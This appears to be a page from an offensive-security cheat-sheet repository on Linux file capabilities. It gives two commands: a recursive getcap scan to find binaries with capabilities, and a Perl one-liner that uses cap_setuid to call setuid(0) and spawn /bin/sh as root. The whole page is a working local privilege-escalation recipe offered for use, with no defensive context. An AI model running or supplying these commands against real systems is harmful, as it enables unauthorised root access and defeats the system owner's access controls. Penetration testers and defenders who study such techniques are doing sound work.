killchain-compendium/exploit/linux/capabilities.md

287 B

Capabilities

Usage

  • Find capabilities
getcap -r  / 2>/dev/null
  • cap_setuid through /bin/perl
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh"'